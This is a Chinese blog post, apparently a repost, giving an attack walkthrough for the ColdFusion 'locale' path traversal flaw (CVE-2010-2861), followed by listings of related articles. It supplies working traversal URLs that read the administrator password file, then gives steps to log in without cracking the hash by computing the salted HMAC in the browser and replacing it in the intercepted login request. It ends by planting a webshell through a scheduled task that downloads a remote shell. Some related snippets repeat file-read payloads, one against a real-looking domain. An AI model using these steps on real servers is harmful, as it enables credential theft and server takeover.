攻击ColdFusion2 –路径遍历漏洞攻略

最新推荐文章于 2024-05-14 23:46:30 发布
最新推荐文章于 2024-05-14 23:46:30 发布
阅读量190 收藏
点赞数
文章标签: shell
原文链接:http://www.cnblogs.com/mujj/articles/3714722.html
版权

编号:CVE-2010-2861 APSB10-18

    ‘locale’ Path Traversal Vulnerability detected

影响版本:

        ColdFusion MX6 6.1 base patches  
        ColdFusion MX7 7,0,0,91690 base patches              无补丁
        ColdFusion MX8 8,0,1,195765 base patches  
        ColdFusion MX8 8,0,1,195765 with Hotfix4

查看版本信息tips:

    http://target.com/CFIDE/adminapi/base.cfc?wsdl


漏洞利用:

 

 

http://target.com/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en

http://target.com/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties%00en

http://target.com/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en

以上是获取CFIDE的密码,其他自行构造。

 

效果如图:

 

 

密码是用sha-1加密过的,可以到http://www.md5decrypter.co.uk/sha1-decrypt.aspx这儿去破解下

破解出来后直接登录即可。

 

Tips: 如果密码破解不出怎么办?放弃?当然不是,这里有个小技巧。coldfusion的密码在验证的时候,是把输入的密码加salt进行HMAC hash后传给服务器,由服务器去计算后验证。所以这时候我们只要传输过去正确的加密后的密码即可成功进入,而不必在那破密码了。但是问题是如何计算 HMAC值。

其实方法很简单,只要用js调用页面里的加密函数即可(页面每30秒刷新一次,所以下手要快),方法如下,这里我用firebug演示了~:

1.F12调出firebug

2.进入控制台选项

3.在下面输入hex_hmac_sha1(document.loginform.salt.value,”password”)  password是你获取到的那个加密后的密码

4.回车,得到一个字符串,如下图:

5.打开burpsuit或者什么的,用来修改数据包用到,这里用tamper data插件,点击start tamper 后点登录,截断修改传送的cfadminPassword值为上面js获取的那个字符串值

6.一路submit,成功不用解密密码进入后台:

 

 

 

后台获取webshell

这个简单,添加计划任务后执行,远程下载一个shell到本地目录就OK了。这里就不多说了。

 

后记:

这个漏洞还算实用,不过大都打补丁了,个人感觉用js绕过解密那步很好。。。

 

关于ColdFusion,未完待续。。。。。。。

转载于:https://www.cnblogs.com/mujj/articles/3714722.html

weixin_30367945
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
oauth2:ColdFusion CFC使用OAuth2协议管理身份验证
05-15
ColdFusion CFC,用于使用OAuth2协议管理身份验证。 基本组件 核心组件oauth2.cfc可用作大多数提供程序的独立OAuth2工具。 实例化组件并传递所需的属性,如下所示: var oOauth2 = new oauth2( client_id = '...
coldfusion9 web application construction kit volume 2
08-27
coldfusion9 v2 web application construction kit volume 2
Adobe ColdFusion RCE(CVE-2019-7839) 漏洞分析
晓得哥的博客
08-05 497
作者: Badcode@知道创宇404实验室 日期: 2019/07/09 原文链接:https://paper.seebug.org/999/ 英文版本:https://paper.seebug.org/1000/ 漏洞简介 ​ Adobe ColdFusion 是一个商用的快速开发平台。它可以作为一个开发平台使用,也可以提供Flash远程服务或者作为 Adobe Flex应用的后台服务器 。 ...
Adobe ColdFusion文件读取漏洞(CVE-2010-2861)
m0_73605862的博客
12-01 539
2.看答案就是一层一层进行路径穿越攻击,这里要注意如果登陆进去后总是会自己跳转到index.cfm,所以得用bp抓包改包。尝试利用漏洞读取目标系统中的“opt/coldfusion8/license.txt"文件。4.然后是opt那个,因为一般opt和etc在同一级目录下,结果成功了。3.之前一直出不来,今天突然出来了,我真的无语死了。1.环境搭建(网上写的密码是admin,就用admin)3.路径穿越就出来了。
09 - vulhub - Adobe ColdFusion 文件读取漏洞(CVE-2010-2861)
最新发布
碧海朝天素
05-14 773
如果你也是看准了Python,想自学Python,在这里为大家准备了丰厚的免费大礼包,带大家一起学习,给大家剖析Python兼职、就业行情前景的这些事儿。
Adobe ColdFusion 文件读取漏洞(CVE-2010-2861)
EC_Carrot的博客
05-20 176
漏洞背景 Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。 影响版本 Adobe ColdFusion 8.0.1 Adobe ColdFusion 9.0.1 Adobe ColdFusion 9.0 Adobe ColdFusion 8.0 漏洞复现 我的环境为vulhub的靶机,启动后,需访问http://your-ip:8500/CFIDE/administ
bbs.rar_coldfusion
09-24
Coldfusion技术在BBS应用中的深度解析》 在信息技术高速发展的今天,各种编程语言层出不穷,其中Coldfusion作为Adobe公司开发的一种服务器端脚本语言,以其高效、易用的特性在Web开发领域占据了一席之地。本文将...
coldfusion_install.pdf
05-28
ColdFusion官网安装文件
Adobe ColdFusion(CVE-2010-2861)文件读取漏洞复现
qq_44504968的博客
09-23 1238
Adobe ColdFusion文件读取漏洞(CVE-2010-2861)漏洞原理实验环境漏洞环境漏洞复现 漏洞原理 Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。 由于AJP协议设计存在缺陷导致内部相关的属性可控,攻击者可以构造属性值,使未授权的用户读取服务器任意文件获得敏感信息,甚至可以进行远程代码执行漏洞的利用。 Adobe ColdFusion 8、9版本中
漏洞复现----17、Adobe ColdFusion目录遍漏洞 (CVE-2010-2861)
七天
10-21 1067
文章目录一、漏洞介绍二、漏洞环境1、环境2、Payload三、漏洞复现1、logging/settings.cfm2、datasources/index.cfm3、j2eepackaging/editarchive.cfm4、CFIDE/administrator/settings/mappings.cfm5、CFIDE/administrator/enter.cfm四、特殊构造1、路径后不跟参数值,失败。2、路径后参数值为数字,成功。3、路径后参数值为字母,成功。4、路径后参数值为特殊符号,成功。 一、
ColdFusion被爆在野利用0day漏洞,Adobe发布紧急预警
blackorbird的博客
03-03 201
Adobe今天发布了紧急更新,修复了ColdFusion Web应用程序开发平台的关键漏洞。该错误可导致任意代码执行,并已在野外被利用。 安全问题允许攻击者绕过上传文...
Adobe ColdFusion 文件读取漏洞(CVE-2010-2861)
weixin_46239998的博客
01-01 666
Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。由于AJP协议设计存在缺陷导致内部相关的属性可控,攻击者可以构造属性值,使未授权的用户读取服务器任意文件获得敏感信息,甚至可以进行远程代码执行漏洞的利用。Adobe ColdFusion 8、9版本中皆存在一处目录穿越漏洞。管理员密码获取到了,就可以正常玩耍了!三、输入admin初始化环境。五、漏洞利用,读取管理员密码。
ColdFusion 9 / 10 Remote Root xday
cnbird's blog
05-09 2674
www.awsurveys.com//CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=../../../../../../../../../../../../../../../etc/hosts&attributes.
coldfusion文件读取漏洞(CVE-2010-2861)
1stPeak's Blog
07-28 869
1、直接访问http//your-ip8500/CFIDE/administrator/enter.cfm?/etc/passwd%00en,即可读取文件/etc/passwd。2、读取后台管理员密码http//your-ip8500/CFIDE/administrator/enter.cfm?/lib/password.properties%00en。AdobeColdFusion8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。解密password。...
vulhub学习笔记-Adobe ColdFusion 文件读取漏洞
ploto_cs的博客
09-11 583
Adobe ColdFusion 文件读取漏洞 一.漏洞介绍 (一)编号 CVE-2010-2861 (二)概述 Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。 Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。 (三)影响版本 Adobe ColdFusion 8、9版本 二.操作步骤 (一)Vulhub i
S2-008 &S2-009 远程代码执行漏洞检测与利用
Fly_鹏程万里
12-14 4081
前言 漏洞环境改自vulhub https://github.com/kingkaki/Struts2-Vulenv S2-008 漏洞信息 https://cwiki.apache.org/confluence/display/WW/S2-008 主要是利用对传入参数没有严格限制,导致多个地方可以执行恶意代码 第一种情况其实就是S2-007,在异常处理时的OGNL执行 第二...
Adobe ColdFusion 安装指南
本文档是Adobe ColdFusion的安装指南,适用于版本更新至2016年2月17日。ColdFusion是一种强大的Web应用开发平台,主要用于构建动态和交互式的网页应用程序。该指南详细介绍了安装过程,包括不同服务器配置、集成技术...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值